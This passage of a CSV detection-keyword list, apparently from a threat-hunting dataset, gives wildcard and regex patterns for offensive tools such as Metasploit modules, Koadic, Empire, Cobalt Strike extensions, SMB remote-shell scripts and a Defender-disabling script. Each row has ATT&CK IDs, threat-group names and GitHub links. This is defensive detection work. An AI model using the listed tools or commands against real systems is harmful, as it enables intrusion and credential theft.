- T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/lengjibo/NetUser","1","1","N/A","N/A","10","10","420","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z","43171" "*enigma_fileless_uac_bypass*",".{0,1000}enigma_fileless_uac_bypass.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","43172" "*enjoiz/Privesc*",".{0,1000}enjoiz\/Privesc.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","1","N/A","N/A","10","6","595","97","2024-12-01T15:24:41Z","2015-11-19T13:22:01Z","43173" "*enkomio/AlanFramework*",".{0,1000}enkomio\/AlanFramework.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","43174" "*enpass2john.py*",".{0,1000}enpass2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","43175" "*enpass5tojohn.py*",".{0,1000}enpass5tojohn\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","43176" "*Enter the Direct Link of malware : *",".{0,1000}Enter\sthe\sDirect\sLink\sof\smalware\s\:\s.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","43177" "*Enter your loclx authtoken:*",".{0,1000}Enter\syour\sloclx\sauthtoken\:.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","43178" "*Enter-SMBSession -ComputerName *",".{0,1000}Enter\-SMBSession\s\-ComputerName\s.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","0","N/A","N/A","9","2","163","25","2024-12-05T16:30:18Z","2023-09-06T16:00:47Z","43179" "*Enter-SMBSession* -PipeName * -ServiceName *",".{0,1000}Enter\-SMBSession.{0,1000}\s\-PipeName\s.{0,1000}\s\-ServiceName\s.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","0","N/A","N/A","9","2","163","25","2024-12-05T16:30:18Z","2023-09-06T16:00:47Z","43180" "*Enter-WmiShell *",".{0,1000}Enter\-WmiShell\s.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/secabstraction/WmiSploit","1","0","N/A","N/A","N/A","2","164","34","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z","43181" "*Enter-WmiShell.ps1*",".{0,1000}Enter\-WmiShell\.ps1.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation 
tool","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","N/A","2","164","34","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z","43182" "*--entrypoint Dinjector*",".{0,1000}\-\-entrypoint\sDinjector.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","0","N/A","private github repo","8","","N/A","","","","43183" "*enum_ad_service_principal_names *",".{0,1000}enum_ad_service_principal_names\s.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","43184" "*enum_artifacts_list.txt*",".{0,1000}enum_artifacts_list\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43185" "*enum_av_excluded.rb*",".{0,1000}enum_av_excluded\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43186" "*enum_avproducts.py*",".{0,1000}enum_avproducts\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","43187" "*enum_brocade.md*",".{0,1000}enum_brocade\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43188" "*enum_domain_info.py*",".{0,1000}enum_domain_info\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","43189" "*enum_enumdomusers(*",".{0,1000}enum_enumdomusers\(.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#linux","N/A","7","6","575","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z","43190" "*enum_firefox.rb*",".{0,1000}enum_firefox\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43191" "*enum_hostfile.md*",".{0,1000}enum_hostfile\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43192" "*enum_logged_on_users*",".{0,1000}enum_logged_on_users.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43193" "*enum_logged_on_users.*",".{0,1000}enum_logged_on_users\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43194" "*enum_mikrotik.md*",".{0,1000}enum_mikrotik\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43195" "*enum_ms_product_keys.*",".{0,1000}enum_ms_product_keys\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43196" "*enum_printers.py*",".{0,1000}enum_printers\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","43197" "*enum_shares.py*",".{0,1000}enum_shares\.py.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. 
is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","43198" "*enum_shares.rb*",".{0,1000}enum_shares\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43199" "*enum_vmware.rb*",".{0,1000}enum_vmware\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43200" "*enum_vyos.md*",".{0,1000}enum_vyos\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43201" "*enum4linux*",".{0,1000}enum4linux.{0,1000}","offensive_tool_keyword","enum4linux","Enum4linux is a tool for enumerating information from Windows and Samba systems. It attempts to offer similar functionality to enum.exe ","T1018 - T1087.002 - T1135 - T1049 - T1033","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/CiscoCXSecurity/enum4linux","1","0","#linux","N/A","N/A","10","1260","243","2024-10-11T14:41:57Z","2015-07-31T21:06:03Z","43202" "*enum4linux_*.txt*",".{0,1000}enum4linux_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","43203" "*enum4linux-ng -A -u *",".{0,1000}enum4linux\-ng\s\-A\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43204" "*Enum-AllTokens*",".{0,1000}Enum\-AllTokens.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43205" 
"*EnumCLR.exe*",".{0,1000}EnumCLR\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 